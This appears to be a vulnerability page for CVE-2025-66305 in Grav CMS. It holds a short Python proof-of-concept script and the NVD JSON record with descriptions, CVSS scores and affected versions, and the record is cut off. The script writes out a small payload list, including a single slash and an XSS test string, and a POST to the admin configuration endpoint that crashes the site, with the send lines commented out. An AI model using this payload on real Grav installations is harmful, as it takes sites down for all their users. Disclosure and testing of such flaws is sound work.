CVE-2025-66305

import requests import re # CVE-2025-66305 PoC - Grav CMS DoS via Languages Config # Target: Grav CMS < 1.8.0-beta.27 # Attack Vector: POST to /admin/config/system with malformed Supported parameter TARGET_URL = "http://target-site.com/admin/config/system" LOGIN_URL = "http://target-site.com/admin" USERNAME = "admin" PASSWORD = "password" session = requests.Session() # Step 1: Login to Grav admin panel login_data = { "username": USERNAME, "password": PASSWORD } # response = session.post(LOGIN_URL, data=login_data) # Step 2: Prepare malicious payload for Languages Supported parameter # The payload triggers regex parsing error in preg_match() payloads = ["/", "<script>alert(1)</script>", "*/", "[invalid]"] # Step 3: Send POST request with malformed Supported value config_data = { "data": { "languages": { "supported": payloads[0] # Single forward slash causes DoS } }, "task": "saveConfig", "form-nonce": "" # Add valid CSRF token } # response = session.post(TARGET_URL, data=config_data) print("PoC for CVE-2025-66305") print("Target: Grav CMS < 1.8.0-beta.27") print("Impact: Server-side regex parsing error causing application-wide DoS")

{"cve": {"id": "CVE-2025-66305", "sourceIdentifier": "[email protected]", "published": "2025-12-01T22:15:50.250", "lastModified": "2025-12-03T18:50:11.847", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Grav is a file-based Web platform. Prior to 1.8.0-beta.27, a Denial of Service (DoS) vulnerability was identified in the \"Languages\" submenu of the Grav admin configuration panel (/admin/config/system). Specifically, the Supported parameter fails to properly validate user input. If a malformed value is inserted—such as a single forward slash (/) or an XSS test string—it causes a fatal regular expression parsing error on the server. This leads to application-wide failure due to the use of the preg_match() function with an improperly constructed regular expression, resulting in an error. Once triggered, the site becomes completely unavailable to all users. This vulnerability is fixed in 1.8.0-beta.27."}, {"lang": "es", "value": "Grav es una plataforma web basada en archivos. Versiones anteriores a la 1.8.0-beta.27, se identificó una vulnerabilidad de denegación de servicio (DoS) en el submenú 'Idiomas' del panel de configuración de administración de Grav (/admin/config/system). Específicamente, el parámetro Supported no valida correctamente la entrada del usuario. Si se inserta un valor malformado —como una sola barra inclinada (/) o una cadena de prueba XSS—, provoca un error fatal de análisis de expresión regular en el servidor. Esto conduce a una falla en toda la aplicación debido al uso de la función preg_match() con una expresión regular construida incorrectamente, lo que resulta en un error. Una vez activado, el sitio queda completamente no disponible para todos los usuarios. Esta vulnerabilidad se corrige en la 1.8.0-beta.27."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-248"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.7.48", "versionEndExcluding": "1.8.0", "matchCriteriaId": "EAC8A2F1-9318-4224-9CF5-D3EFE16E81F4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "8A383F2E-C6BA-440B-B648-A3313B7D91C3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta10:*:*:*:*:*:*", "matchCriteriaId": "F7EF2DEC-2798-4D0D-9C27-0F01BAFEAEFD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta11:*:*:*:*:*:*", "matchCriteriaId": "530C6F64-F30B-4E93-9A12-D9625EA57483"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta12:*:*:*:*:*:*", "matchCriteriaId": "9AC28BF9-626D-4514-91F0-F81DAB5D3602"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta13:*:*:*:*:*:*", "matchCriteriaId": "307AA375-E531-4AE5-BA79-2F9D4DE7A05F"}, {" ... (truncated)